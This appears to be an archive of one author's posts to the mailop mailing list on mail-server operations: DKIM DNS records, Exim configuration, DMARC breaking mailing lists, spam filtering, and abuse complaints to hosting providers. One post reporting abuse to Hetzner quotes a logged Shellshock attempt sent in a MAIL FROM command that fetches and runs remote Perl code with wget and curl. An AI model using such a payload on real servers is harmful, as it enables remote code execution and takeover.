Re: [mailop] customers forging addresses for phishing

2024-09-21 Thread Lena--- via mailop
> From: "L. Mark Stone" 

> FWIW, for a while now we have been outright blocking all email from any
> subdomain of

> If anyone has an example of how what we are doing would lead to a false
> positive, I would be grateful to know please.

One of my 3500 customers uses email address
where X is her surname.

Received: from
x-forefront-antispam-report: ...;SFV:NSPM;...

mailop mailing list

Re: [mailop] Plain connections on SubmissionS port

2024-08-12 Thread Lena--- via mailop
> From: Slavko

I'm curious: do you get many legitimate connections to tls_on_connect port 465
(instead of STARTTLS 587)?

Do you tell your users how to use 587, 465 or both?
mailop mailing list

Re: [mailop] % in SRS ?

2024-03-09 Thread Lena--- via mailop
> You will still run into a fair number of systems that still see % as
> an attempt to do source routing and reject the message.

Including default Exim config:

denydomains   = !+local_domains
local_parts   = ^[./|] : ^.*[@%!] : ^.*/\\.\\./
message   = Restricted characters in address

mailop mailing list

Re: [mailop] Dot as the first character of a line ? (RFC 5321, Section 4.5.2)

2024-03-01 Thread Lena--- via mailop
> From: Cyril - ImprovMX

> It turns out that one of their link in the email is broken into multiple
> line (following the RFC on that)

Solution: don't follow the RFC on that, don't break into multiple lines.
If you use Exim then in transports

  driver = smtp
  message_linelength_limit = 15000

All was fine until Exim developers decided to follow RFC on that.

> and surprisingly, the dot from
> "www.domain" was starting as the new line, which gives:

So it turned out that breaking into multiple lines is not as simple
when the break point happens near a dot.

mailop mailing list

Re: [mailop] Any old-school sendmail types here good with the m4?

2023-08-23 Thread Lena--- via mailop
> I don't know where 
> to buy the brand of LSD that they did at UC Berkeley when they wrote this, 
> in order to make m4 make sense.

They chose incomprehensible m4 in order to coerce you to buy support from them.
mailop mailing list

Re: [mailop] NS DKIM

2023-03-27 Thread Lena--- via mailop
> That (sub)domain is not DNSSEC signed, thus it will work with
> (many) recursive resolvers for some time. DNSSEC mandates
> NoDATA for empty non terminals, thus there can be problem
> once it become signed (and SW and/or admin will not be
> upgraded).

Okay, I created a TXT record for the parent _domainkey .
Though I'm sure that most other users of such registrar's web-interfaces
wouldn't do that.
mailop mailing list

[mailop] NS DKIM

2023-03-27 Thread Lena--- via mailop
> If the DNS name exists, then
> exists too.

dig txt 66633 IN TXT "v=DKIM1; p=MIGfMA0GCSqGSIb...

dig txt
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 57410

`dig @` tells the same. `dig +trace 3._dom...` works.
mailop mailing list

Re: [mailop] mailgun anybody? (variable sender address) time

2023-03-27 Thread Lena--- via mailop
> > > They have SPF, but no DKIM (NXDOMAIN for the
> > > Or did I miss something?
> > 
> > The DKIM keys would be at
> Yes, but as long as the parent of *any* selector does not exist, there
> is a very good chance, that not any selector exists.
> If the query for would return a no-data answer, than
> I can assume that they have someing below that name (most probably
> selectors I do not know until I get a mail from them.)

For NS I currently use the registrar. Its web-interface allowed me to create
the TXT record for a selector. The parent _domainkey - NXDOMAIN.

mailop mailing list

[mailop] Hetzner

2023-02-07 Thread Lena--- via mailop
I emailed abuse()


Your user at hosts malware to exploit vulnerability in
mail (SMTP) servers. In the log of my Exim:

2023-01-17 00:33:40 +0200 SMTP call from (x) 
[] dropped: too many syntax or protocol errors (last command was 
"MAIL FROM:<() { :; }; wget -qO -|perl;curl -sS|perl>",  C=HELO,MAIL)


20 days (!) later I received a reply [AbuseID:BEA948:23]:


We have received your information regarding spam and/or abuse and we shall 
follow up on this matter.

The person responsible has been sent the following instructions:
- Solve the issue
- Send us a response


My conclusion is that Hetzner is a heaven for spammers.

mailop mailing list

Re: [mailop] Opinions.. Layer Host aka Global Frag, Higher level approaches

2022-11-20 Thread Lena--- via mailop
> Just ban *.top, *.xyz, *.club, *.shop, *.buzz, *.work
> Ban it in both rDNS, MFROM and Mime From.

I communicated with 6 honest people with email addresses *.xyz

mailop mailing list

Re: [mailop] T-Online is now really blocking messages from non-commercial and simliar senders

2022-10-20 Thread Lena--- via mailop
> From: Kai 'wusel' Siering 

> > Then a different check:
> I don't speak smail3^Hexim anymore, but I assume it's somewhat similar to
> telnet $mx 25
> if 2xx send quit
> if 5xx set fuckem=1 && send quit || ignore errors
> if $fuckem<1 die in_peace else wreck havoc
> ?

I don't know why, but Exim's ${readsocket works without the "quit":

[root@lena ~]# time exim -be '${readsocket{}{}{2s}}!' T-Online ESMTP receiver fssmtpd ready.
220 T-Online ESMTP receiver ready.

sys 0m0.001s
[root@lena ~]# telnet 25
Connected to
Escape character is '^]'. T-Online ESMTP receiver fssmtpd ready.
220 T-Online ESMTP receiver ready.
221-2.0.0 closing.
221 2.0.0 Closing.
Connection closed by foreign host.
[root@lena ~]#

mailop mailing list

Re: [mailop] T-Online is now really blocking messages from non-commercial and simliar senders

2022-10-20 Thread Lena--- via mailop
> T-Online clearly states in their terms and conditions that they will
> block servers who perform sender verfication towards them.

Then a different check:

 deny condition = ${if or{\
{forany{${lookup dnsdb{>: defer_never,mxh=$sender_address_domain}}}\
  condition = ${if match{${readsocket{inet:\
${reduce{${lookup dnsdb{>: defer_never,mxh=$sender_address_domain}}}\
:25}{}{2s}}}{^554 IP=}}
  message = We checked that $sender_address_domain blocks us. \
So we do not accept a message we cannot reply to.
# The server admin may change "deny" to "warn" and
# "message =" to "control = fakereject/"
# but few admins will want that (or notice and bother).

mailop mailing list

Re: [mailop] T-Online is now really blocking messages from non-commercial and simliar senders

2022-10-20 Thread Lena--- via mailop
Kai Siering wrote on [mailop]:

> how about starting internal discussions within that community
> to include a default rejection of any mail from
> in Exim's default configuration?

> As nearly no-one who is deploying Exim
> (or Postfix, Sendmail for that matter)
> will be able to *send* to due to their policy,
> it is only logical to not *accept* any mail from them, too.

I propose to include in default Exim config (in rcpt ACL)
a code which checks whether the server is blocked by

 warn set acl_m_ton = notton
  condition = ${if or{\
{forany{${lookup dnsdb{>: defer_never,mxh=$sender_address_domain}}}\
  set acl_m_ton = checkdefer
  !verify = sender/callout=10s
  set acl_m_ton = $acl_verify_message

 deny condition = ${if !eq{$acl_m_ton}{notton}}
  condition = ${if !eq{$acl_m_ton}{checkdefer}}
  message = sender verify failed: $acl_m_ton

 deny condition = ${if eq{$acl_m_ton}{checkdefer}}
  message = We checked that $sender_address_domain blocks us. \
So we do not accept a message we cannot reply to.
# The server admin may change "deny" to "warn" and
# "message =" to "control = fakereject/"
# but few admins will want that (or notice and bother).

mailop mailing list

Re: [mailop] Looking for contact at

2022-06-29 Thread Lena--- via mailop
> The good folks at SecurityTrails figured out a few months ago that the
> presence of the RoundCube webmail product counts as "phishing against
> the generic brand of email" (I shit you not)

By default RoundCube doesn't include originating-IP into headers
of outgoing emails. Default means vast majority of installations.
mailop mailing list

Re: [mailop] spam filters

2022-01-25 Thread Lena--- via mailop
> From: "Sebastian Nielsen" 

> for example *.xyz is a big spam hole... Don't know why spammers love
> that TLD, but 99.99 % from that TLD is spam. Would want to see *.xyz
> eradicated from the whole internet...

I communicated with 6 honest people with email addresses *.xyz

mailop mailing list

Re: [mailop] [E] Re: What am I supposed to do with abuse complaints on legit mail?

2022-01-15 Thread Lena--- via mailop
> From: Marcel Becker 

> We only send FBL/CFL reports if the user actually hits the "Report as Spam"
> button in our apps.

In the past yahoo sent FBL when the user deletes a message from Spam folder,
including "delete everything". May be even when messages expire.
I'd not be surprised if this behavior continues.
mailop mailing list

Re: [mailop] Google Postmaster Tools - No data since October 4th

2021-10-14 Thread Lena--- via mailop
> From: Jaroslaw Rafa 

> "low reputation of the sending domain"

I'm afraid that it'll be the same for any free domain name
(because of abuse by spammers). Unfair, yes.

But possibly content of your emails causes Gmail users to click "Spam"
more often than caused by average user stupidity.
Or you pissed off one Gmail user, and now he clicks "Spam" on every your email.
Or he always deletes everybody's emails with the Spam button.

Influence of IP block or AS reputation also is possibile,
despite the text of the error message.
mailop mailing list

Re: [mailop] How to detect fraud login in POP IMAP or SMTP?

2021-09-21 Thread Lena--- via mailop
> From: Alessio Cecchi 

> we are an email hosting provider, and as you know many users use weak 
> passwords, or have trojan on their PC that stolen their password that 
> are used to sent spam or doing some kinds of fraud.
> We already have a "script" that checks, from log files, the country of 
> the IP address and "do something" to detect if is an unusual login. But 
> is not really sufficient.

I suspect that stealing passwords with trojans is more successful
than brute-forcing passwords via POP, IMAP or SMTP.
Therefore, detecting logins for brute-forcing is not enough.
You need to detect when stolen passwords are used to send spam
via your server. One approach is to check rate of attempts to send
to non-existent recipient email addresses, because spammers usually
send to dirty lists of email addresses full of message-ids,
truncated email addreses or prepended with garbage.
I wrote an implementation for Exim:
It also detects some brute-forcing, but the main is automatic blocking
of accounts used for spamming with trojan-stolen passwords.

mailop mailing list

Re: [mailop] broke mailing lists

2021-07-12 Thread Lena--- via mailop
> My guess is that the solution is to have your mailing list software
> ( use the mailing list address in the 5322.From
> (like how this list works)

No, I'll tell list members to ditch
and use Gmail or instead (with more reasonable policies).

Unless the admin on this list understands the problem
and doesn't try to tell every mailing list admin in the world
to conform to his whims.

The admin already rewrites "From:" for domains with DMARC p=reject.
I don't want him to mangle every "From:".

mailop mailing list

[mailop] broke mailing lists

2021-07-12 Thread Lena--- via mailop
According to Юлия П. in Abuse Team,
they'll not change their new unannounced policy:
messages from mailing lists (at from authors
are rejected by though DMARC for is p=none.

Thus, became unusable for all people who participate
in discussion mailing lists.

Below my futile attempts to explain (bottom-quoting required by them).


Subject: Re: [Ticket#2021071021014077] Мои письма воспринимаются как спам
Date: Mon, 12 Jul 2021 11:54:08 +0300
From: "" 


Ответ о причине блокировке был дан ранее, каждый почтовый провайдер в праве
использовать собственные метрики для своей антиспам-системы.
Блокировка писем, которые поступают без авторизации на соответствующих
серверах, не будет снята, эта логика не может быть изменена.

С уважением,
Юлия П.
Abuse Team

> У домена политика DMARC "p=none", именно чтобы не ломать
> mailing lists. Поэтому в данном случае не имеет права
> отвергать письма по поводу DMARC.
> имел бы право отвергать письма, если бы написал
> "p=reject".
> Но yandex этого не сделал. Преднамеренно, чтобы discussion mailing lists
> могли продолжать работать.
> Я надеюсь, что сегодня на смене поддержки более компетентный
> работник.
> ~ $ dig +short txt
> "v=DMARC1; p=none; fo=1;
> ~ $
> > Повторимся, SPF в ваших письмах действительно проходят проверку, но из-за
> > того, что From и envelope-from не совпадают, такие письма технически
> > считаются подставными по отношению к домену, указанному во From - адресу
> > видимому получателю, по аналогии с действием политики DMARC:
> >
> > 
> > Для решения вопроса вы можете использовать иную систему, используя адрес в
> > собственном домене в качестве отправителя, а не сохраняя/подставляя адрес
> > клиента. В таком случае письма успешно пройдут спам-фильтры.
> > 
> > --
> > С уважением,
> > Юлия П.
> > Abuse Team
> > 
> > 
> > > Вы не понимаете, как работают SPF и discussion mailing list.
> > > Вы наверно даже никогда не пользовались ими.
> > > Участники конференции отправляют письма на адрес конференции
> > > (в данном случае, сервер конференций
> > > рассылает копии всем участникам конференции. В строке заголовка "From:"
> > > сохраняется (не подставляется, а сохраняется!) адрес автора письма
> > > (в данном случае,
> > > а в envelope-from (Return-Path) сервер конференций указывает адрес
> > > .
> > > Это не я придумала, listserver-ы используются с 1984 года.
> > > Проверка SPF должна быть по envelope-from, а не "From:".
> > > Вы не понимаете, что такое envelope-from.
> > > Вы жмете на первую попавшуюся кнопку, не понимая сути проблемы.
> > > Пожалуйста, передайте эту переписку специалистам.
> > > 
> > > > Мы понимаем, как работает SPF и для какого домена она проверяется. Суть 
> > > > не
> > > > в невалидности SPF самой по себе, а в том, что фактически письма
> > > > отправляются с одних серверов, а в качестве отправителя подставляется
> > > > совершенно иной домен mailbox-провайдера. Если вы не можете обеспечить
> > > > авторизацию непосредственно для, отправляя письма якобы с 
> > > > него,
> > > > рекомендуем использовать соответствующий вашему собственному домену 
> > > > From.
> > > > 
> > > > --
> > > > С уважением,
> > > > Юлия П.
> > > > Abuse Team
> > > > 
> > > > 
> > > > > Работник support-а Юлия П. не читает, тыкает на кнопки куда попадя.
> > > > > 
> > > > > > Письмо, по вопросу блокировки которого вы обратились, было 
> > > > > > отправлено с
> > > > > > без авторизации на их серверах (не прошло проверку 
> > > > > > SPF/DKIM). 
> > > > > > Подробнее об этих настройках можно узнать здесь:
> > > > > >
> > > > > > 
> > > > > > Если вы хотите отправлять письма с ящика, то они должны 
> > > > > > поступать
> > > > > > с авторизацией на серверах Яндекса соответственно. Если же 
> > > > > > валидность
> > > > > > SPF/DKIM для не может быть обеспечена, используйте адрес в
> > > > > > собственном домене в качестве отправителя. Напомним о необходимости
> > > > > > реализации SPF, DKIM и DMARC для него перед отправкой писем.
> > > > > > 
> > > > > > --
> > > > > > С уважением,
> > > > > > Юлия П.
> > > > > > Abuse Team
> > > > > > 
> > > > > > Помог ли вам данный ответ?
> > > > > > >  Все темы, Мои письма воспринимаются как спам 
> > > > > > > 
> > > > > > > 
> > > > > > > Я модератор email-конференции (discussion mailing list) на сервере
> > > > > > > Этот сервер использует всего два IP-адреса 
> > > > > > > и
> > > > > > > для отправки почты из многих тысяч ко

Re: [mailop] Mailman confirmation email denial of service

2020-08-21 Thread Lena--- via mailop
> I have searched a few emails, but fail to see why they would be a
> target. Maybe only a few of them are the real targets, with other
> addresses being added in order to conceal those?

I suspect that the bot is spamming random web-forms
like various bots try to spam my guestbook with ads with links.
If a bot sees an "email" field then it fills it with a random email address.

mailop mailing list

Re: [mailop] Ideas for possible content for FAQ: "Best Practices for running a mail server"

2020-02-17 Thread Lena--- via mailop
> Either links to existing material or specific stuff written for pages
> on would be welcome.

Blocking of compromised mail accounts (for Exim):

mailop mailing list

[mailop] Russian government blocks mail

2020-01-30 Thread Lena--- via mailop
Russian government blocked ProtonMail and SmartMail -
not only web-interfaces, but port 25 too.

[root@lena ~]# telnet 25
telnet: connect to address Connection refused

I'm moving my VPS outside Russia.

Talks about fake bomb threats are a lie, KGB (FSB) wants personal data.

mailop mailing list

Re: [mailop] Gmail marking email from me as spam

2019-10-14 Thread Lena--- via mailop
Two examples:

Looks similar, right?  But there are multiple domains under
belonging to multiple different corporaions, like under .com belongs to single corporation (it owns also
If a mailbox provider wants to spam-filter by domain, they have to use
a list of such multiple-corporation domains (what is the proper term?).
How a mailbox provider might know to include into that list?
Whois for doesn't offer a clue.

mailop mailing list

Re: [mailop] Admin: Gmail users of mailop suspended due to bounces.

2019-04-28 Thread Lena--- via mailop
> Another issue in that is the choice to send mail over IPv6. This has
> well-known risks of running into more draconian filtering than sticking
> with IPv4, and the operators of the mailing lists system have clearly
> NOT considered those risks or their mitigation.

> Mailing list managers should not assume anything about the 
> state of messages that come in.  Especially if there is a trivial action 
> that they can take to make sure that the message they send out does not 
> break something.

I receive digests from [mailop]. Header of last digest hasn't DKIM.
The envelope-from is ,
the domain currently hasn't SPF.
With sending mail via IPv6, it's a recipe for disaster.

~ $ dig +short txt
~ $

> In this case, said trivial action is removing / renaming the incoming 
> DKIM-Signature header.

And adding one for the domain.

mailop mailing list